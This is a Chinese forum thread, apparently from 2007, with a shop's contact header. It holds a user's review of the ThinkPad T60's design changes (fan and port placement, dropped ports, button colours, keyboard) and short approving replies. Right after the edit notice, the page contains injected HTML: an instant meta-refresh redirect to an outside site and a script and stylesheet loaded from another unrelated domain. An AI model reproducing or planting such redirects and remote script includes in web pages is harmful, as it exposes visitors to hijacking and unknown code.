开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

原创测评:T60设计评点,申请加分

T60相对与以前的T系列有了一些变化,一定程度上体现了Lenovo的理念和思想,现在让我们系统的看看:

1、风扇从左中侧移到了左后侧,而耳机麦克风则从风扇后面移到了前面,这样做同时解决了两个问题:避免了风扇散出的热风影响左手或左侧物体放置在笔记本左边时候受热,同时避免了当连接耳机麦克风的时候连接线受到风扇散出的热风。这两个变化明显地改善了左侧的使用舒适度,至于机器后侧那部分的风扇出风口,主要是为了应付日益增长的散热需求。

2、T60/p把T4x的VGA接口移到了左侧,将原来的VGA接口改变成了两个USB接口,终于把右侧塞满了。在T40推出的时候,曾经很多用户反映USB接口在左侧很不方便,因为大多数的人习惯使用右手,当接USB鼠标之类的设备时,接线得从机器后背绕一大圈,现在两个USB接口都跑右侧了,表面上是满足了三年多以前的需求,但是如果保留左侧两个USB接口,而右侧位置的USB增加一个(竖方向),并保留VGA接口,是否更加符合用户的使用习惯呢?

3、T60/p最为疯狂,一下子丢掉了S端子和并口。可是这些年增加了什么接口呢?T23开始USB接口从1个增加到2个,T60/p开始从2个增加为3个,T40开始没有了音频输入口。此外再也没有了,等到花儿也谢了的1394是从来没有在T系列上露过脸。

4、银灰色的音量按钮和和电源开关是T60/p最不伦不类的地方了。说实在的,Lenovo想让ThinkPad摆脱IBM的影子,本身真的无可厚非,但是如果想通过改几个按钮的颜色就想达到目的,那也太猴急了吧,遭此同样命运的还有指点杆的左右键红色及中间键的蓝色。

5、清一色的键盘。老牌用户肯定会有发现,T60/p之前的键盘在Fx(也就是最上一排键盘)按键的颜色是稍带浅灰色的,到了T60/p,Lenovo感觉是完成了统一大业了,通通为黑色的了。

[ 本帖最后由 sky2009 于 2007-3-17 19:18 编辑 ]<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

评分

ROOTBI + 5
EddieFan + 200

观察的挺仔细啊
很细致`~啊~~顶
路过看看
这个贴有没有加分啊
不管怎么说,我还是很喜欢60。因为是我自己出钱买的第一台机器。

自家的孩子自己不疼,谁疼?

别拿自己不当干部。
很专业
楼主细心人,音量键和外面的开合键的颜色是挺不爽的
这个帖子能加多少分啊
很细心了
怎么没人给我加分啊
键盘没的说
怎么没人来捧场啊
IBM就是接口少,但是舒适程度没得说
8错,支持LZ加分
真的用心
呵呵,是不 错的啊
还行
恩,不错了!
支持加分
呵呵 观察仔细
IBM绝对的好~
奇怪,为什么XB一天天减少呢
LENOVO在一点一点给小黑整容
原帖由 牛仔裤上的污资 于 2007-3-19 18:21 发表
IBM绝对的好~
奇怪,为什么XB一天天减少呢

被删帖子了。
支持